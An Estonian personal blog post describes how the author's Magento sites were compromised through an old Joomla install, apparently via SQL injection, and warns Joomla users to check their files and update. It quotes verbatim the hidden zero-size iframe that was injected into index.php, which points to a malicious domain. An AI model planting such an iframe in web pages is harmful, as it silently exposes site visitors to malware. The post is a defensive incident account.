pronto.ee

Tomorrow will be cancelled due to lack of interest

I got pwnd!

Joomla

Joomla

Kuradi raisakurat! Teate, alalõpmata kirjutatakse õudusjuttu sellest, kuidas üks või teine viirus kurja teeb ja kuidas üks või teine worm kuskil asju vasakule tõstab. Enamasti on need kirjutatud inimeste poolt, kes teavad sellistest asjadest kolmandate inimeste vahendusel ja kelle eesmärk on pakkuda põnevust inimestele, kes jutust aru ei saa. Samad inimesed kirjutavad lehtedesse ka seiklusjutte sellest, kuidas “Arctic Sea”-ga tiibrakette veetakse. Intrigeeriv, aga peaaegu alati ainult teoreetiline lugemine.

Täna siis märkasin, et millegipärast minu mõlemad Magento installatsioonid on käpa maha pannud veateatega, mis viitab justkui oleks programmikood vigane. Viskasin Magento index.php-le pilgu peale ja etskae: faili lõppu on tekkinud iseeneseslikult järgnev rida:

<iframe src="http://google-analyze.org/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Paanika! Kiire otsing näitas, et tegemist on selge pahavaraga, mis kuidagi mu masinasse on pugenud ja seal oma valgustkartvaid tegusi sooritab. Edasine otsing viitas sellele, et suure tõenäosusega on tegemist ka SQL injectionist tingitud rünnakuga. Veelgi edasisem otsing tuvastas masinast mingil iidsel ajal sinna testimiseks üles pandud Joomla installatsiooni, mis osutuski ründevektori alguspunktiks.

Soovitus nüüd kõigile, kes Joomlat kasutavad. Vaadake, ega teil kusagil failides iframe-ga algavat rida ei ole, mida te ei mäleta sinna pannud olevat. See aadress, mis src sees on, võib olla teine, kuid suures plaanis peaks välimus umbes sama olema. Minu puhul jäi see muudatus vahele ainult Magento eripärade tõttu, enamustel jääkski see ilmselt kahe silma vahele. Joomla on meil üsna levinud tarkvara ja ma ei usu mitte, et igaüks viitsib oma installatsioone regulaarselt uuendada.

Update early, update often!

2 Comments

  • Reply Lauri |

    Joomla ammuse kasutajana võin öelda, et koodist seda rida naljalt ei pruugi leida, sest enamasti on lisandused mingil moel kodeeritud. Kontrollida tuleb genereeritud lehekülgi, õigemini genereeritud HTML-i.

  • Reply Pronto |

    Grepi ammuse kasutajana võin öelda, et grep -r “google-analyze” avitas. Ütleme nii, et seekord lõppes asi ainult ehmatusega. Loodetavasti see jama enam kusagilt uuesti pinnale ei kerki.

Post a comment